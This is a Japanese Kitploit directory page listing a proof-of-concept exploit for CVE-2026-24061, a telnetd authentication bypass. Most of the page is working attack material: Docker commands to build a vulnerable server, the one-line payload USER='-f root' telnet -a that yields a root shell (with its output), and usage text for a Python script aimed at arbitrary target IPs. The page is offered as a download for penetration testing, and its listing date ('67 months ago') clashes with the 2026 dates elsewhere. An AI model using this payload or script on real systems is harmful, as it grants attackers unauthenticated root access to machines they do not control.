Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — CVE-2026-24061の概念実証エクスプロイト。Telnet NEW-ENVIRON RCE脆弱性に対するもので、Docker再現環境とPython検出スクリプトを備えています。 | Kitploit
ツール/GitHubGitHub/r00tuser111/cve-2026-24061
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubr00tuser111/cve-2026-24061

CVE-2026-24061

CVE-2026-24061の概念実証エクスプロイト。Telnet NEW-ENVIRON RCE脆弱性に対するもので、Docker再現環境とPython検出スクリプトを備えています。

リポジトリを見る
67ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061

再現手順

イメージをビルドする

root@kitploit:~
docker build -t telnetd-bypass .

コンテナを起動する

root@kitploit:~
docker run -it --rm \
  --name telnetd-vuln \
  --privileged \
  -p 23:23 \
  telnetd-bypass

payloadを送信する

root@kitploit:~
USER='-f root' telnet -a 127.0.0.1 23

戻り値

root@kitploit:~
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.10.14-linuxkit (c910afb30330) (pts/1)

Linux c910afb30330 6.10.14-linuxkit #1 SMP Tue Oct 14 07:32:13 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 22 05:55:47 UTC 2026 from 172.64.155.119 on pts/1
root@c910afb30330:~#

再現スクリプト:

python3 poc.py -h

root@kitploit:~
usage: poc.py [-h] -t TARGET [-p PORT]

CVE-2026-24061 Telnet NEW-ENVIRON RCE 脆弱性検出ツール

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        ターゲット IP アドレス
  -p PORT, --port PORT  ターゲットポート (デフォルト: 23)

例:
  poc.py -t 192.168.1.100 -p 23
  poc.py --target 127.0.0.1 --port 23

参考リンク:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA
ツールをダウンロード